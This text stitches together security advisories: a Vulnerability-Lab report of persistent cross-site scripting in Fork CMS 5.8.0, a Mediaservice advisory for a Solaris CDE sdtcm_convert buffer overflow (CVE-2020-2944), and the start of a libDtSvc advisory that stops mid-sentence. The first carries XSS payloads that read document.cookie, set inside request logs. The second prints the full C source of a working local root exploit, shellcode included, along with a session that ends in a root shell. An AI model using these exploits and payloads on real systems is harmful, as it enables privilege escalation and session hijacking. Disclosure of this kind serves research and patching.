Document Title:
===============
Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2208

ID (3073):  https://github.com/forkcms/forkcms/pull/3073


Release Date:
=============
2020-04-17


Vulnerability Laboratory ID (VL-ID):
====================================
2208


Common Vulnerability Scoring System:
====================================
5.3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Fork is an easy to use open source CMS using Symfony Components. Fork
CMS is dedicated to creating a user friendly environment
to build, monitor and
update your website. We take great pride in being the Content Management
System of choice for beginners and professionals.

(Copy of the Homepage: https://www.fork-cms.com  &
https://www.fork-cms.com/download )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the official Fork CMS v5.8.0.


Affected Product(s):
====================
ForkCMS
Product: Fork CMS v5.8.0 - Content Management System (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2020-04-17: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been
discovered in the official Fork CMS v5.8.0 open-source web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.

The persistent input validation web vulnerabilities are located in the
`Displayname` input field when using the `Add`, `Edit` or `Register`
mechanism that forwards the information into the `var` parameter. Remote
attackers and privileged application user accounts are able to
inject own malicious persistent script code as the users displayname by
usage of the registration module (/profiles/register). Privileged
users with access to the profile or users module are able to exploit the
issue by a simple inject. The displayname then becomes visible in
the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
Interaction and User Index in Listing modules. the var parameter
does not encode or parse the exisiting injected content and executes it.
The request method to inject is POST and the attack vector of the
vulnerability is located on the application-side of the content
management system. The injection point is located in the registration form
and the add/edit user function. The execution point of the issue occurs
in the preview profile, edit user, user index listing and delete
user message context.

Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Register
[+] Add User
[+] Edit User

Vulnerable Input(s):
[+] Displayname

Vulnerable Parameter(s):
[+] var

Affected Module(s):
[+] Preview Profile
[+] Edit User
[+] User Index
[+] Delete User


Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information an steüs below to continue.


Manual steps to reproduce the vulnerability ...
1. Open the fork cms web-application newst version
2. Move via sitemap or by link to the registration page
(/modules/profiles/register)
3. Inject your script code payload html/js to the Displayname input field
4. Register the account by pushing submit
5. Activate the link in the account registration email
Note: Now simple wait until the administrator / privileged user visits
the panel to execute the code on interaction or preview only
6. Successful reproduce of the persistent script code injection
vulnerability!


PoC: Vulnerable Source (User Index in Listing -
https://fork-cms.localhost:8080/private/en/users/index)
<tr id="row-2" class="even">
<td class="nickname"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
title="edit">test3"><iframe src="evil.source"
onload=alert(document.cookie)></a></td>
<td  class="fork-data-grid-action actionEdit"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
class="btn btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr>


PoC: Vulnerable Source (Profiles Index on Preview -
https://fork-cms.localhost:8080/private/en/profiles/index)
<tbody><tr id="row-1" class="odd">
<td class="check"><input type="checkbox" name="id[]" value="1"
class="inputCheckbox checkBeforeUnload"></td>
<td class="email"><a
href="/private/en/profiles/edit?token=k7byefqor8&id=1"
title="">tester23@protonmail.com</a></td>
<td class="display_name">"<iframe src="evil.source"
onload="alert(document.cookie)"></td>
<td  class="registered_on">13 April 2020 11:17</td>
<td  class="fork-data-grid-action actionEdit">
<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr></tbody>


PoC: Vulnerable Source (Delete User - On Interaction)
<form name="delete" method="post"
action="/private/en/users/delete?token=k7byefqor8">
<input type="hidden" id="delete__token" name="delete[_token]"
value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
<input type="hidden" id="delete_id" name="delete[id]" value="2" />
<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
aria-hidden="true" aria-labelledby="confirmDeleteTitle">
<div class="modal-dialog"><div class="modal-content"><div
class="modal-header">
<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
<div class="modal-body">
<p>Are your sure you want to delete the user "evil.source"><iframe
src=evil.source onload=alert(document.cookie)>"?</p></div>
<div class="modal-footer">
<button class="btn btn-default" title="Cancel"  data-dismiss="modal">
<span class="fa fa-times" aria-hidden="true"></span>
<span class="btn-text">Cancel</span></button>
<button class="btn btn-danger" title="Delete">
<span class="fa fa-trash" aria-hidden="true"></span>
<span class="btn-text">Delete</span>
</button></div></div></div></div>
</form>


--- PoC Session Logs [POST] (Registration User Account) ---
https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie:
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;

interface_language=en; frontend_language=en; cookie_bar_agree=Y;
cookie_bar_hide=Y;
form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
src=evil.source
onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
Max-Age=2592000;
path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
13-Apr-2021 09:49:57 GMT;
Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: https://fork-cms.localhost:8080
X-server: fork01


-- PoC Session Logs [POST] (Add User) ---
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Content-Type: multipart/form-data;
boundary=---------------------------56051791419552543783889366402
Content-Length: 2545
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
Upgrade-Insecure-Requests: 1
form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
src=a onload=alert(document.cookie)>&avatar=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing
&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
X-server: fork01
-
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3615
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
-
GET: HTTP/1.1 200 OK
Server: nginx/1.6.2
https://fork-cms.localhost:8080/private/en/users/evil.source
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: /private/en/error?type=action-not-allowed
X-server: fork01


-- PoC Session Logs [POST] (Edit User) ---
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Content-Type: multipart/form-data;
boundary=---------------------------388544425912514902093103180709
Content-Length: 2563
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
&nickname=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing&
csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&highlight=row-2
X-server: fork01
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3585
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01


Reference(s):
https://fork-cms.localhost:8080/en/modules/profiles/register
https://fork-cms.localhost:8080/private/en/profiles/index
https://fork-cms.localhost:8080/private/en/users/index
https://fork-cms.localhost:8080/private/en/users/edit
https://fork-cms.localhost:8080/private/en/users/add


Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the fork cms web-application is estimated as high.


Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com    www.vuln-lab.com      
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com
paste.vulnerability-db.com       infosec.vulnerability-db.com
Social:      twitter.com/vuln_lab    facebook.com/VulnerabilityLab     
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™




-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

@Mediaservice.net Security Advisory #2020-05 (last updated on 2020-04-15)

         Title:  Local privilege escalation via CDE sdtcm_convert
   Application: Common Desktop Environment 1.6 and earlier
     Platforms:  Oracle Solaris 10 1/13 (Update 11) and earlier
    Other platforms are potentially affected (see below)
   Description:  A local attacker can gain root privileges by exploiting a
    buffer overflow in CDE sdtcm_convert
        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
 Vendor Status:  Oracle <secalert_us@oracle.com> notified on 2019-12-08
    CERT/CC notified on 2019-12-09 (tracking VU#308289)
      CVE Name:  CVE-2020-2944
   CVSS Vector:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 8.8)
    References: https://github.com/0xdea/advisories/blob/master/2020-05-cde-sdtcm_convert.txt
    https://www.oracle.com/security-alerts/cpuapr2020.html
    https://www.oracle.com/technetwork/server-storage/solaris10/
    https://www.mediaservice.net/
    https://0xdeadbeef.info/

1. Abstract.

A buffer overflow in the _SanityCheck() function in the Common Desktop
Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
earlier allows local users to gain root privileges via a long calendar name or
calendar owner passed to sdtcm_convert in a malicious calendar file.

The open source version of CDE (based on the CDE 2.x codebase) is not affected,
because it does not ship the vulnerable program.

2. Example Attack Session.

bash-3.2$ cat /etc/release
                    Oracle Solaris 10 1/13 s10x_u11wos_24a X86
  Copyright (c) 1983, 2013, Oracle and/or its affiliates. All rights reserved.
                            Assembled 17 January 2013
bash-3.2$ uname -a
SunOS nostalgia 5.10 Generic_147148-26 i86pc i386 i86pc
bash-3.2$ id
uid=54322(raptor) gid=1(other)
bash-3.2$ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
bash-3.2$ ./raptor_sdtcm_conv
raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>

Using SI_PLATFORM       : i86pc (5.10)
Using SI_HOSTNAME       : nostalgia
Using stack base        : 0x8047fff
Using rwx_mem address   : 0xfeffa004
Using payload address   : 0x8047dff
Using strcpy() address  : 0xfefe26a0

Preparing the evil calendar file... Done.
Exploiting... Please answer "n" when prompted.
Loading the calendar ...
[...]
Do you want to correct it? (Y/N) [Y] n
# id
uid=0(root) gid=1(other) egid=12(daemon)

3. Affected Platforms.

All platforms shipping the Common Desktop Environment based on the CDE 1.x
codebase are potentially affected. This includes:

* Oracle Solaris 10 1/13 (Update 11) and earlier [default installation]

The open source version of CDE (based on the CDE 2.x codebase) is not affected,
because it does not ship the vulnerable program.

4. Fix.

Oracle has assigned the tracking# S1239395 and has released a fix for all
affected and supported versions of Solaris in the Critical Patch Update (CPU)
of April 2020.

As a workaround, it is also possible to remove the setuid bit from the
vulnerable executable as follows (note that this might prevent it from working
properly):

bash-3.2# chmod -s /usr/dt/bin/sdtcm_convert

Please note that during the audit many other potentially exploitable bugs have
surfaced in sdtcm_convert and in the Common Desktop Environment in general.
Therefore, removing the setuid bit from all CDE binaries is recommended,
regardless of patches released by vendors.

5. Proof of Concept.

An exploit for Oracle Solaris 10 1/13 (Update 11) Intel has been developed as a
proof of concept. It can be downloaded from:

https://github.com/0xdea/exploits/blob/master/solaris/raptor_sdtcm_conv.c

raptor_sdtcm_conv.c proof of concept:

/*
 * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
 * Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
 *
 * A buffer overflow in the _SanityCheck() function in the Common Desktop
 * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
 * earlier allows local users to gain root privileges via a long calendar name
 * or calendar owner passed to sdtcm_convert in a malicious calendar file
 * (CVE-2020-2944).
 *
 * The open source version of CDE (based on the CDE 2.x codebase) is not
 * affected, because it does not ship the vulnerable binary.
 *
 * "CDE, the gift that keeps on giving" -- @0xdea
 * "Feels more like a curse you can't break from this side." -- @alanc
 *
 * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
 * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
 * space, try returning to sprintf() instead of strcpy().
 *
 * I haven't written a Solaris/SPARC version because I don't have a SPARC box
 * on which Solaris 10 can run. If anybody is kind enough to give me access to
 * such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
 *
 * Usage:
 * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
 * $ ./raptor_sdtcm_conv
 * [...]
 * Do you want to correct it? (Y/N) [Y] n
 * # id
 * uid=0(root) gid=1(other) egid=12(daemon)
 * #
 *
 * This should work with any common configuration on the first try. To
 * re-enable rpc.cmsd, clear its service maintenance status by running the
 * following commands as root:
 * # /usr/sbin/svcadm clear cde-calendar-manager
 * # /usr/bin/svcs -a | grep calendar
 * online         13:16:54 svc:/network/rpc/cde-calendar-manager:default
 *
 * Tested on:
 * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
 * [previous Solaris versions are also likely vulnerable]
 */

#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>

#define INFO1   "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2   "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"

#define VULN    "/usr/dt/bin/sdtcm_convert" // the vulnerable program
#define ADMIN   "/usr/dt/bin/sdtcm_admin"   // calendar admin utility
#define BUFSIZE 2304                // size of the name/owner
#define PAYSIZE 1024                // size of the payload
#define OFFSET  env_len / 2         // offset to the shellcode

char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";

/* globals */
char    *env[256];
int env_pos = 0, env_len = 0;

/* prototypes */
int add_env(char *string);
void    check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void    set_val(char *buf, int pos, int val);

/*
 * main()
 */
int main(int argc, char **argv)
{
    char    buf[BUFSIZE], payload[PAYSIZE];
    char    platform[256], release[256], hostname[256];
    int i, payaddr;

    char    *arg[3] = {"foo", "hax0r", NULL};
    int sb = ((int)argv[0] | 0xfff);    /* stack base */
    int ret = search_ldso("strcpy");    /* or sprintf */
    int rwx_mem = search_rwx_mem(); /* rwx memory */

    char    cmd[1024];
    FILE    *fp;

    /* print exploit information */
    fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);

    /* read command line */
    if (argc != 1) {
        fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
        fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
        exit(1);
    }

    /* get system information */
    sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
    sysinfo(SI_RELEASE, release, sizeof(release) - 1);
    sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);

    /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
    memset(payload, '\x90', PAYSIZE);
    payload[PAYSIZE - 1] = 0x0;
    memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));

    /* fill the envp, keeping padding */
    add_env(payload);
    add_env("HOME=/tmp");
    add_env(NULL);

    /* calculate the payload address */
    payaddr = sb - OFFSET;

    /* prepare the evil palette name */
    memset(buf, 'A', sizeof(buf));
    buf[sizeof(buf) - 1] = 0x0;

    /* fill with function address in ld.so.1, saved eip, and arguments */
    for (i = 0; i < BUFSIZE - 16; i += 4) {
        set_val(buf, i, ret);       /* strcpy */
        set_val(buf, i += 4, rwx_mem);  /* saved eip */
        set_val(buf, i += 4, rwx_mem);  /* 1st argument */
        set_val(buf, i += 4, payaddr);  /* 2nd argument */
    }

    /* print some output */
    fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
    fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
    fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
    fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
    fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
    fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);

    /* create the evil calendar file */
    fprintf(stderr, "Preparing the evil calendar file... ");
    snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
    if (system(cmd) == -1) {
        perror("Error creating calendar file");
        exit(1);
    }
    if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
        perror("Error creating calendar file");
        exit(1);
    }

    /* prepare the evil calendar file (badchars currently not handled) */
    fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
    if (!fp) {
        perror("Error preparing calendar file");
        exit(1);
    }
    fprintf(fp, "Version: 4\n(calendarattributes "
"(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
"\"10:access_list\",\"world:2\")\n");
    /* buffer overflow in calendar name */
    fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"%s\")\n", buf);
    fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"fnord\")\n)");
    /* buffer overflow in calendar owner */
    /*
    fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"hax0r\")\n");
    fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"%s\")\n)", buf);
    */
    fclose(fp);

    fprintf(stderr, "Done.\n");

    /* run the vulnerable program */
    fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
    execve(VULN, arg, env);
    perror("execve");
    exit(0);
}

/*
 * add_env(): add a variable to envp and pad if needed
 */
int add_env(char *string)
{
    int i;

    /* null termination */
    if (!string) {
        env[env_pos] = NULL;
        return env_len;
    }

    /* add the variable to envp */
    env[env_pos] = string;
    env_len += strlen(string) + 1;
    env_pos++;

    /* pad the envp using zeroes */
    if ((strlen(string) + 1) % 4)
        for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
            env[env_pos] = string + strlen(string);
            env_len++;
        }

    return env_len;
}

/*
 * check_zero(): check an address for the presence of a 0x00
 */
void check_zero(int addr, char *pattern)
{
    if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
        !(addr & 0xff000000)) {
        fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
        exit(1);
    }
}

/*
 * search_ldso(): search for a symbol inside ld.so.1
 */
int search_ldso(char *sym)
{
    int     addr;
    void        *handle;
    Link_map    *lm;

    /* open the executable object file */
    if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
        perror("dlopen");
        exit(1);
    }

    /* get dynamic load information */
    if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
        perror("dlinfo");
        exit(1);
    }

    /* search for the address of the symbol */
    if ((addr = (int)dlsym(handle, sym)) == NULL) {
        fprintf(stderr, "Sorry, function %s() not found\n", sym);
        exit(1);
    }

    /* close the executable object file */
    dlclose(handle);

    check_zero(addr - 4, sym);
    return addr;
}

/*
 * search_rwx_mem(): search for an RWX memory segment valid for all
 * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
 */
int search_rwx_mem(void)
{
    int fd;
    char    tmp[16];
    prmap_t map;
    int addr = 0, addr_old;

    /* open the proc filesystem */
    sprintf(tmp,"/proc/%d/map", (int)getpid());
    if ((fd = open(tmp, O_RDONLY)) < 0) {
        fprintf(stderr, "Can't open %s\n", tmp);
        exit(1);
    }

    /* search for the last RWX memory segment before stack (last - 1) */
    while (read(fd, &map, sizeof(map)))
        if (map.pr_vaddr)
            if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
                addr_old = addr;
                addr = map.pr_vaddr;
            }
    close(fd);

    /* add 4 to the exact address NULL bytes */
    if (!(addr_old & 0xff))
        addr_old |= 0x04;
    if (!(addr_old & 0xff00))
        addr_old |= 0x0400;

    return addr_old;
}

/*
 * set_val(): copy a dword inside a buffer (little endian)
 */
void set_val(char *buf, int pos, int val)
{
    buf[pos] =  (val & 0x000000ff);
    buf[pos + 1] =  (val & 0x0000ff00) >> 8;
    buf[pos + 2] =  (val & 0x00ff0000) >> 16;
    buf[pos + 3] =  (val & 0xff000000) >> 24;
}


Copyright (c) 2020 Marco Ivaldi and @Mediaservice.net. All rights reserved.

@Mediaservice.net Security Advisory #2020-06 (last updated on 2020-04-15)

         Title:  Stack-based buffer overflow in CDE libDtSvc
   Application: Common Desktop Environment 2.3.1 and earlier
    Common Desktop Environment 1.6 and earlier2020-06-cde-libDtSvc.txt
     Platforms:  Oracle Solaris 10 1/13 (Update 11) and earlier
    Other platforms are potentially affected (see below)
   Description:  A difficult to exploit stack-based buffer overflow in the
    libDtSvc library distributed with CDE may allow local users to
    corrupt memory and potentially execute aritrary code in order
    to escalate privileges
        Author:  Marco Ivaldi <marco.ivaldi@mediaservice.net>
 Vendor Status:  Oracle <secalert_us@oracle.com> notified on 2019-12-15
    CERT/CC notified on 2019-12-15 (tracking VU#308289)
      CVE Name:  CVE-2020-2851
   CVSS Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H (Base Score: 7.8)
    References: https://github.com/0xdea/advisories/blob/master/2020-06-cde-libDtSvc.txt
    https://www.oracle.com/security-alerts/cpuapr2020.html
    https://sourceforge.net/p/cdesktopenv/wiki/Home/
    https://www.oracle.com/technetwork/server-storage/solaris10/
    https://www.mediaservice.net/
    https://0xdeadbeef.info/

1. Abstract.

A difficult to exploit stack-based buffer overflow in the _DtCreateDtDirs()
function in the Common Desktop Environment version distributed with Oracle
Solaris 10 1/13 (Update 11) and earlier may allow local users to corrupt memory
and potentially execute arbitrary code in order to escalate privileges via a
long X11 display name. The vulnerable function is located in the libDtSvc
library and can be reached by executing the setuid program dtsession.

Note that Oracle Solaris CDE is based on the original CDE 1.x train, which is
different from the CDE 2.x codebase that was later open sourced. In detail, the
open source CDE is not affected by this specific vulnerability, but following
